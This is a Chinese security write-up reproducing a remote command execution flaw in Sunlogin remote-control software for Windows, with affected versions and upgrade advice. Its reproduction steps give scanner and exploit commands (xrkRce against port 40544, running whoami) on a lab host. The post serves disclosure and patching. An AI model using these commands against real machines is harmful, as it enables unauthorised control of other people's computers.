0x00 漏洞描述
向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
上海贝锐信息科技股份有限公司向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
0x01 存在漏洞版本
上海贝锐信息科技股份有限公司 向日葵个人版for Windows 11.0.0.33 <=
上海贝锐信息科技股份有限公司 向日葵简约版 V1.0.1.43315(2021.12)
0x02 漏洞复现
下面我们来对漏洞进行复现,小编使用的是向日葵Ver.11.0.0.33162
1.首先安装有漏洞版本
2.使用sunlogin_rce工具来检测该漏洞,因为该工具使用Go语言编写,使用之前我们需要使用命令:go build进行编译,可以发现我们在编译之后文件夹中多出了xrkRce的文件。
3.我们可以使用命令:./xrkRce -h来查看使用方法。
4.我们使用命令:./xrkRce -h 10.211.55.3来扫描安装漏洞版向日葵的目标主机(10.211.55.3),发现其40544端口存在Rce漏洞。
5.我们使用命令:./xrkRce -h 10.211.55.3 -t rce -p 40544 -c "whoami"来进行验证,发现成功执行whoami命令。
0x03 修复建议
建议卸载旧版本向日葵,并去官网下载最新个人版安装使用。
下载地址:https://sunlogin.oray.com/download
0x04 下载链接
公众号后台回复向日葵。
0x05 说明
本文内容及使用工具仅限学习交流,用户滥用造成的一切后果均与作者无关,作者不承担任何直接责任, 后果均由用户本人负责,使用者请务必遵守当地法律法规。
原文始发于微信公众号(Hx0战队):向日葵原创RCE漏洞复现及修复建议
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论